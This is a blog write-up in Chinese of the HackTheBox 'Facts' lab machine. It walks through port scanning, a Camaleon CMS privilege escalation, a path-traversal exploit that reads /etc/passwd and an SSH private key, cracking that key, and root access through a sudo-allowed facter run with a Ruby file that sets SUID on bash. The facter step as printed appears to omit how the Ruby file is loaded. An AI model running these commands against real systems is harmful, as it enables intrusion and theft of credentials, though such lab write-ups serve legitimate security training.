HTB-Facts 靶场复盘

2026-3-8 65 3/8

└─$ nmap -p- --min-rate 10000 10.129.244.96
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-08 05:22 EDT
Warning: 10.129.244.96 giving up on port because retransmission cap hit (10).
Nmap scan report for facts.htb (10.129.244.96)
Host is up (0.27s latency).
Not shown: 38322 closed tcp ports (conn-refused), 27211 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 117.69 seconds

先看看网页

是个静态的,没什么东西,没交互

使用dirb http://facts.htb 简单扫一下

发现http://facts.htb/admin可以进入,不知道账户密码,但是可以注册一个

随便注册123用户登陆进去,也没什么东西,但发现可以修改个人信息,且发现使用了Camaleon CMS 2.9

搜一下发现CVE-2025-2304,使用查看https://techwithz.com/posts/cve-2025-2304-poc/

使用后,自己的123用户变成了有admin权限的了

但是找不到getshell的点,尝试继续搜POC

发现了https://github.com/Goultarde/CVE-2024-46987

里面说了这么一句话在“Camaleon CMS 2.8.0至< 2.8.2版本中发现了一个路径穿越漏洞(奇怪的是,2.9.0版本也有效)。

使用exp,先后查看用户,读取私钥试试(id_rsa、id_ed 25519、id_ecdsa)

python3 CVE-2024-46987.py -u http://facts.htb -l 123 -p 12 /etc/passwd | grep 'bash'

python3 CVE-2024-46987.py -u http://facts.htb -l 123 -p 12 /home/trivia/.ssh/id_ed25519

发现了trivia的私钥,使用ssh2john转换,john破解得到密码

ssh登录(记得使用 -i  选择私钥来登录)

登录后sudo -l

trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter

直接在https://gtfobins.org/中找利用方法

我使用的是

echo 'system("chmod u+s /bin/bash")' > /tmp/shell.rb

sudo /usr/bin/facter

/bin/bash -p

获得了root

flag分别位于 /home/william  与  /root  目录下

- THE END -

sanoplluser

3月08日17:43

最后修改:2026年3月8日
0

非特殊说明,本博所有文章均为博主原创。

共有 0 条评论